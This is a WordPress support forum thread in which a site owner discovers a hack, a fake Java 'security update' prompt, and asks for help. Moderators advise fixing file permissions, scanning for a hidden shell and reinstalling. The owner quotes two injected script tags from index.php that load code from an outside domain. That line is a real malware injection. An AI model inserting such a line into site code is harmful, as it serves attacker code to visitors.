WordPress.org

Support

Support » How-To and Troubleshooting » A java plugin needs permission to run on your site

A java plugin needs permission to run on your site

  • I think this is quite suspicious, the name of this plugin is *Atencao* Atualisacao de Seguranca Clique em Executar (or something like that). The site suddenly appears on the left side of the window in IE9 but is still centered in Chrome and Firefox.

    I deactivated all the plugins the site is using but that did not change anything. Has my website been hacked or what ?

Viewing 8 replies - 1 through 8 (of 8 total)
  • esmi

    @esmi

    Forum Moderator

    Where did you download this plugin from? Have you tried resetting the plugins folder by FTP or PhpMyAdmin. Sometimes, an apparently inactive plugin can still cause problems.

    Thats the thing, I didn´t download this plugin at all (not that I know of anyway) and now that the website is left aligned in IE I´m afraid it has been hacked somehow or something is just not right… I deleted all inactive plugins but that didn´t change anything.

    My index.php file was probably hacked. These two lines were at the top <script type=”text/javascript” src=”http://anisioteixeira.com.br/red.php”></script>
    <script type=”text/javascript” src=”http://anisioteixeira.com.br/red.php”></script>

    Is there any way to know how this was done ? My theme had CHMOD 777 on all files but now I changed them to 755.

    Moderator kmessinger

    @kmessinger

    Directories should be 755, files should be 644.

    kmessinger is right. The way your permissions are set, your blog is wide open to the world. CHMOD all your folders (directories) to 755 and all the directory contents to 644. Make sure your .htaccess file doesn’t have any new code in it. CHMOD the .htaccess file to 644 also (the world should have zero access to read, write, or execute that file). Then run a virus scan on your server (or ask your host to do it) to find the shell that the hacker is using. You can reinstall wordpress, but if the shell is hidden in one of your other directories you will be reinfected. After the scan results come back clean, change all passwords, reinstall the latest version of wordpress.

    Moderator kmessinger

    @kmessinger

    @ kmessinger or 440.

    Thank you very much guys, I will harden my WordPress installation on the server.

Viewing 8 replies - 1 through 8 (of 8 total)
  • The topic ‘A java plugin needs permission to run on your site’ is closed to new replies.
Skip to toolbar